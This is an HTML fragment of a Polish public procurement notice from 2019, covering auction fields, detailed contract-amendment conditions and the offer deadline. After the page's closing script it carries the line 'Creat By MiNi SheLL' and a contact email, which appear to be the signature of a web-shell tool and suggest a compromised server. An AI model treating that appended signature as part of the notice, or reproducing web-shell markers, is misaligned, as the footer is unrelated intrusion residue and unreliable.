id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zgodnie z treścią par.15 umowy stanowiącej załącznik nr 9 do SIWZ: Zakazuje się zmianpostanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonanowyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności: 1.1.Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającymwpływ na realizację przedmiotu Umowy, w tym przepisów w zakresie ochrony danychosobowych oraz ustawy o jawności życia publicznego. 1.2. Wyniknięcia rozbieżności lubniejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposóba zmiana będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów, 1.3. Wystąpienia konieczności zmiany osóbwskazanych w ofercie przy pomocy, których wykonawca realizuje przedmiot Umowy (śmierć, choroba, ustanie stosunku pracy, reorganizacja, lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy). Przedmiotowa zmiana jest możliwa pod warunkiemzaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez Zamawiającego w SIWZ. 1.4. Zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 ustawy Pzp, w celuwykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. 1.5. Zmiany Podwykonawcy pod warunkiem spełnienia warunków określonych w Umowie. 1.6.Powierzenia wykonania części zamówienia podwykonawcy zgodnie z obowiązującymi przepisami prawa oraz postanowieniami Umowy. 1.7. Wystąpienia konieczności zmian osóbWykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na innespełniające na dzień składania ofert warunki określone w SIWZ, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego. 1.8. Wystąpienia koniecznościwprowadzenia zmian w harmonogramie realizacji przedmiotu Umowy poprzez: przesunięciew czasie, w tym związane ze zmianą finansowania, zmianę zakresów rzeczowychzakończonych i wyodrębnione technicznie elementy robót, uszczegółowienie spowodowane obiektywnymi czynnikami, niezależnymi od Wykonawcy, uniemożliwiającymi realizacjęprzedmiotu Umowy zgodnie z pierwotną wersją przedmiotowego Harmonogramu. 2. Zmiana terminu realizacji przedmiotu umowy może ulec zmianie w przypadku wystąpienia opóźnieńwynikających z okoliczności: 2.1.1. wstrzymania realizacji Umowy przez Zamawiającego;2.1.2. konieczności usunięcia błędów, wad lub wprowadzenia zmian w dokumentacji projektowej lub STWiORB; 2.1.3. działania organów administracji lub innych podmiotów, wszczególności: 2.1.3.1. przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, opinii, uzgodnień, postanowień;2.1.3.2. odmowy lub zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, opinii, uzgodnień, postanowień na skutek błędów wdokumentacji projektowej lub z przyczyn niezawinionych przez Wykonawcę; 2.1.3.3.wydania postanowienia o wstrzymaniu robót budowlanych, w przypadku o którym mowa wart. 50 ust. 1 ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jedn. Dz. U. z 2016 r. poz.290 z późn. zm.).; 2.1.3.4. konieczności uzyskania orzeczenia sądowego lub innego organu,którego konieczności nie przewidywano przy zawieraniu Umowy; 2.1.4. wystąpieniakonieczności zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznychlub zawodowych nieartykułowanych lub niemożliwych do jednoznacznego określenia wchwili zawarcia Umowy; 2.1.5. wystąpienia nieprzewidzianych lub odmiennych odprzyjętych w specyfikacji istotnych warunków zamówienia dalej ,,SIWZ", ale istotnych dlarealizacji Przedmiotu Umowy: 2.1.5.1. warunków geologicznych, archeologicznych, wodnychlub terenowych, w szczególności niewypały i niewybuchy, wykopaliska archeologiczne,wysoki poziom wód gruntowych ponad poziom określony w dokumentacji; 2.1.5.2.warunków geologicznych lub terenowych w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych lub ich elementów lub podziemnychurządzeń, instalacji, fragmentów budowli, obiektów infrastrukturalnych lub ich części; 2.1.6.wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie (prowadzenie) robót przez okres dłuższy niż 14 kolejnych dni kalendarzowych, przeprowadzenie prób isprawdzeń, dokonywanie odbiorów - fakt ten musi mieć odzwierciedlenie w dziennikubudowy i musi być potwierdzony przez inspektora nadzoru lub Zamawiającego; 2.1.7.działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającejbezpośredni wpływ na terminowość wykonywania Przedmiotu Umowy; 2.1.8. koniecznościwykonania robót dodatkowych lub udzielenia zamówień, o których mowa w art. 67 ust.1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U.2015 r. poz. 2164 z późn. zm.), które wstrzymają lub opóźnią realizację Przedmiotu Umowy,wystąpienia niebezpieczeństwa kolizji z planowanymi lub ewentualnymi równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lubusunięcia tych kolizji, 2.1.9. wystąpienia okoliczności, których strony Umowy nie były wstanie przewidzieć, pomimo zachowania należytej staranności; 2.1.10. przyczyn nieleżącychpo stronie Wykonawcy. 3. Wystąpienia konieczności wprowadzenia zmian spowodowanychnastępującymi okolicznościami: 3.1.1. siła wyższa (np. klęski żywiołowe, wojny, rewolucje,embarga przewozowe, katastrofy, strajki generalne lub lokalne) uniemożliwiająca wykonanieprzedmiotu Umowy zgodnie ze szczegółowym opisem przedmiotu Umowy oraz mająca wpływ na terminowość wykonania przedmiotu Umowy, 3.1.2. przestojów i opóźnieńzawinionych przez Zamawiającego, mających bezpośredni wpływ na terminowość realizacji przedmiotu Umowy. Zmiana terminu wykonania przedmiotu Umowy przez Zamawiającegoskutkuje jego przedłużeniem o okres przestojów i opóźnień, 3.1.3. koniecznością usunięciabłędów lub wprowadzenia zmian w dokumentacji projektowej, 3.1.4. koniecznościąwprowadzenia uszczegółowienia Umowy w zakresie dotyczącym realizacji Umowy przez Wykonawcę lub podwykonawcę w celu możliwości dokonania bezpośredniej zapłaty na rzecz Podwykonawcy lub dalszego podwykonawcy, 3.1.5. przedłużenia się czynności odbiorowychz przyczyn leżących po stronie Zamawiającego, pod warunkiem zgłoszenia przez Wykonawcę robót budowlanych Zamawiającemu do odbioru końcowego robót w terminie określonym w§3 Umowy, 3.1.6. zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, 3.1.7. zmiany danych teleadresowych, 3.1.8. wystąpienie omyłek pisarskich irachunkowych w treści Umowy. 3.2. W przypadku wystąpienia któregokolwiek ze zdarzeńwymienionych w pkt. 1.1.-1.11 termin realizacji Przedmiotu Umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia realizacji przedmiotuUmowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 3.3.Konieczności wprowadzenia zmian w przedmiocie Umowy oraz sposobie rozliczeniaPrzedmiotu Umowy w przypadku braku możliwości uzyskania przez Wykonawcę, z winyZamawiającego decyzji o pozwoleniu na użytkowanie obiektu budowlanego w wykonanymzakresie objętym Przedmiotem Umowy. 3.4. Zmiana sposobu spełnienia świadczenia na skutek następujących okoliczności: 3.4.1. niedostępności na rynku materiałów lub urządzeńwskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbiorurobót budowlanych spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tychmateriałów lub urządzeń; 3.4.2. pojawienie się na rynku materiałów lub urządzeń nowszejgeneracji; 3.4.3. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązańtechnicznych/technologicznych/zamiennych niż wskazane w szczegółowym opisieprzedmiotu zamówienia, dokumentacji projektowej lub specyfikacji technicznej wykonania iodbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązańgroziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy lub gdy zastosowanie innych rozwiązań technicznych/technologicznych/zamiennych będzieskutkować poprawieniem parametrów technicznych i użytkowych lub pozwoli nazaoszczędzenie kosztów realizacji Przedmiotu Umowy lub kosztów eksploatacji wykonanegoPrzedmiotu Umowy. W przypadku dostarczenia w wyniku zmiany urządzeń lub materiałów,na które wymagane było posiadanie określonych prawem świadectw, certyfikatów lub innychpodobnych zaświadczeń, takie świadectwa, certyfikaty lub zaświadczenia będą wymagane wobec urządzeń lub materiałów zastępujących te wskazane w dokumentacji projektowej lubspecyfikacji technicznej wykonania i odbioru robót budowlanych, 3.4.4. rezygnacja przez Zamawiającego z realizacji części Przedmiotu Umowy, 3.4.5. wykonania robót zamiennych.3.5. Konieczności wprowadzenia podziału Przedmiotu Umowy na etapy lub na kolejne etapy,zmian w Przedmiocie Umowy z przyczyn technicznych, technologicznych, prowadzonychspraw sądowych, administracyjnych, konieczności uzyskania decyzji. 3.6. Doprecyzowanialub zmiany treści protokołów odbiorów. 3.7. Zmiany wysokości wynagrodzenia w sytuacji rezygnacji przez Zamawiającego z realizacji części przedmiotu Umowy, wystąpienia robótzaniechanych, zamiennych, w tym zmiany materiału budowlanego lub technologii, rozwiązańtechnicznych. 3.8. Konieczności wprowadzenia zmian w zapisach Umowy dotyczącychPodwykonawcy lub dalszego podwykonawcy. 3.9. Uzgodnienia z gestorami sieci zakresu,wysokości wynagrodzenia oraz sposobu finansowania robót realizowanych w ramachUmowy. W przypadku dokonania uzgodnień Zamawiający wprowadzi do Umowy zmiany wzakresie: 3.9.1. wydzielenia zakresu rzeczowego finansowanego przez poszczególnychgestorów sieci, 3.9.2. zapewnienia nadzoru inwestorskiego nad zakresem rzeczowymfinansowanym przez poszczególnych gestorów sieci, 3.9.3. sposobu rozliczania ifinansowania zakresów rzeczowych finansowanych przez poszczególnych gestorów sieci,3.9.4. treści protokołów odbioru częściowego robót oraz protokołów odbioru końcowegorobót. 4. Zamawiający dopuszcza możliwość wprowadzenia zmiany umowy w innychprzypadkach wymienionych w art. 144 ustawy Pzp. 5. Zamawiający dopuszcza możliwość wprowadzenia zmiany umowy w przypadku, gdy wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca: 5.1. w wyniku połączenia, podziału,przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego podwykonawcy lubjego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnychzmian umowy lub 5.2. w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w szczególności na skutek utraty płynności finansowejprzez wykonawcę i niezapłacenia należności podwykonawców/dalszych podwykonawców. 6.Strony dopuszczają możliwość zmiany wysokości wynagrodzenia Wykonawcy z tytułurealizacji Umowy w sytuacji, gdy konieczność wprowadzenia tych zmian spowodowana jest:6.1. zmianą stawki podatku od towarów i usług, pod warunkiem, iż Wykonawca wykaże, że zmiana stawki podatku od towarów i usług realnie zwiększyła koszty Wykonawcy przy realizacji przedmiotu umowy. W takim przypadku Wykonawca ma obowiązek w terminie 30dni od zmiany wysokości stawki podatku od towarów i usług złożyć do Zamawiającegopisemny wniosek, w którym musi wykazać rzeczywisty wpływ zmiany stawki podatku nazwiększenie kosztów realizacji Umowy, przedstawiając w tym szczegółowe wyliczenia izależności między zmianą stawki podatku od towarów i usług a wzrostem kosztów realizacji Umowy. Zamawiający w terminie 10 dni od dnia złożenia wniosku ocenia czy Wykonawca wykazał rzeczywisty wpływ zmian na wzrost kosztów realizacji Umowy. Po oceniedostarczonych dokumentów i obliczeń Strony przystępują do negocjacji w zakresiezwiększenia wynagrodzenia umownego brutto, przy czym wynagrodzenie umowne nettopozostanie bez zmian. Wynagrodzenie brutto Wykonawcy ulega zmianie w przypadkuwejścia w życie zmiany przepisów w zakresie wysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacji niniejszej umowy. Wówczas, wynagrodzeniebrutto Wykonawcy za część prac wykonywaną po terminie wprowadzenia zmiany ulegniestosownym zmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian. 6.2.zmianą wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę podwarunkiem, że zmiana ta skutkować będzie zwiększeniem kosztów po stronie Wykonawcy związanych z realizacją Umowy. W takim przypadku Wykonawca ma obowiązek w terminie 30 dni od zmiany wysokości minimalnego wynagrodzenia złożyć do Zamawiającego pisemny wniosek, w którym musi wykazać rzeczywisty wpływ zmiany minimalnego wynagrodzeniana zwiększenie kosztów realizacji Umowy, przedstawiając w tym szczegółowe wyliczenia izależności między zmianą wysokości minimalnego wynagrodzenia a wzrostem kosztówrealizacji Umowy. Zamawiający w terminie 10 dni od dnia złożenia wniosku ocenia czy Wykonawca wykazał rzeczywisty wpływ zmiany na wzrost kosztów realizacji Umowy. Poocenie dostarczonych dokumentów i obliczeń Strony przystępują do negocjacji w zakresiezwiększenia wynagrodzenia umownego brutto. 6.3. zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczeniaspołeczne lub zdrowotne, pod warunkiem wykazania przez Wykonawcę rzeczywistegowpływu zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniuzdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne na zwiększenie kosztów związanych z realizacją przedmiotu umowy. W takim przypadkuWykonawca ma obowiązek w terminie 30 dni od zmian złożyć do Zamawiającego pisemny wniosek, w którym musi wykazać rzeczywisty wpływ zmiany zasad podleganiaubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składkina ubezpieczenia społeczne lub zdrowotne na zwiększenie kosztów realizacji Umowy,przedstawiając w tym szczegółowe wyliczenia i zależności między zmianą zasadprzyznawania a wzrostem kosztów realizacji Umowy. Zamawiający w terminie 10 dni od dnia złożenia wniosku ocenia czy Wykonawca wykazał rzeczywisty wpływ zmian w zakresiepodlegania lub zmian wysokości składek na wzrost kosztów realizacji Umowy. Po ocenie dostarczonych dokumentów i obliczeń Strony przystępują do negocjacji w zakresie zwiększeniawynagrodzenia umownego brutto." 7. Zamawiający dopuszcza możliwość wprowadzeniazmiany umowy polegającej na kumulatywnym przystąpieniu do długu po stronie wykonawcy podmiotu trzeciego. 8. Wszelkie zmiany do niniejszej Umowy wymagają pisemnego aneksupodpisanego przez obie Strony pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-06-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com